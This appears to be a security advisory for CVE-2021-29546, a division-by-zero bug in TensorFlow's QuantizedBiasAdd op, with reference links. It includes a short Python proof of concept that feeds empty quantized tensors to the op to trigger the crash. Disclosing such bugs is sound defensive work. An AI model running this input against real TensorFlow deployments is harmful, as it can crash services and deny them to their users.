CVE-2021-29546: Division by 0 in `QuantizedBiasAdd`
(updated )
An attacker can trigger an integer division by zero undefined behavior in tf.raw_ops.QuantizedBiasAdd:
import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8)
bias = tf.constant([], shape=[0], dtype=tf.quint8)
min_input = tf.constant(-10.0, dtype=tf.float32)
max_input = tf.constant(-10.0, dtype=tf.float32)
min_bias = tf.constant(-10.0, dtype=tf.float32)
max_bias = tf.constant(-10.0, dtype=tf.float32)
tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input,
max_input=max_input, min_bias=min_bias,
max_bias=max_bias, out_type=tf.qint32)
References
- github.com/advisories/GHSA-m34j-p8rj-wjxq
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-474.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-672.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-183.yaml
- github.com/tensorflow/tensorflow/commit/67784700869470d65d5f2ef20aeb5e97c31673cb
- github.com/tensorflow/tensorflow/security/advisories/GHSA-m34j-p8rj-wjxq
- nvd.nist.gov/vuln/detail/CVE-2021-29546
Detect and mitigate CVE-2021-29546 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →